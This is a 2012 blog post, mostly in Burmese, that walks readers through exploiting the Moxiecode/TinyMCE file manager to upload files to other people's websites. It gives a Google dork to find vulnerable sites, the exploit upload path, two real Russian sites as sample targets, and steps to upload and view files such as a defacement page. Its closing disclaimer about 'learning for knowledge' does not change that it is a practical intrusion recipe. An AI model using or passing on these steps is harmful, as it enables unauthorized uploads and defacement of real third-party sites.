Monday, August 20, 2012
Moxiecode Remote File upload[Tut]
ပထမဆံုး Google ကိုဖြင္႔ျပီး ေအာက္က dork ကို ကူးထည္႔ျပီး search ကိုနွိပ္လိုက္ပါ
Google Dork
intitle:Moxiecode File browser filetype:php
အျခား dork ေတြကို user brain အေပၚမွာပဲ႔မူတည္ပါတယ္
search result ထဲက website တစ္ခုကိုေရြးလိုက္ပါ
အဲဒီအခါမွာေတာ႔ website ရဲ႕ url က ေအာက္ကလိုျဖစ္သြားမွာပါ
Exploit
http://[site]/../../js/tiny_mce/plugins/filemanager/upload.php
ဆိုက္္နမူနာပံုစံ
http://www.atmasphere.ru/filemanager/frameset.php
http://www.ss32.ru/filemanager/frameset.php
ဟုတ္ျပီ ဒါဆို ကၽြန္ေတာ္တို႔ေရြးထားတဲ႔ website ရဲ႕ page header ထဲ႔မွာ icons ကိုေတြ႔ပါမယ္
ျပီးေတာ႔ upload လုပ္ဖို႔ဆက္ၾကိဳးစားရမွာပါ upload icon ကို နွိပ္လိုက္တဲ႔အခါမွာေတာ႔ upload လုပ္ဖို႔ pop up window တက္လာပါလိမ္႔မယ္
အဲမွာ သင္ upload လုပ္လိုက္ပါေတာ႔
upload လုပ္လိုက္တဲ႔ ဟာကိုၾကည္႔ခ်င္တယ္ဆိုရင္ေတာ႔ site.com/images/yourfile အဲဒီ url အတိုင္းသြားၾကည္႔ပါ
တစ္ကယ္လို႔ Images သို႔ html ဖိုင္ကို upload လုပ္တယ္ဆိုရင္ေတာ႔ ကၽြန္ေတာ္တို႔လုပ္လိုက္တဲ႔ပံုစံက ဒီလိုျဖစ္သြားမွာပါ
site.com/files/hacker625.html သို႔မဟုတ္ဘူးဆိုရင္ေတာ႔ site/../../js/tiny_mce/plugins/filemanager/files/hacker625.html
ကဲ႔ အဆင္ေျပပါေစ
I not Hacker :) Just learning for knowledge & web security
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
Thanks for your comments
Welcome from cyberoot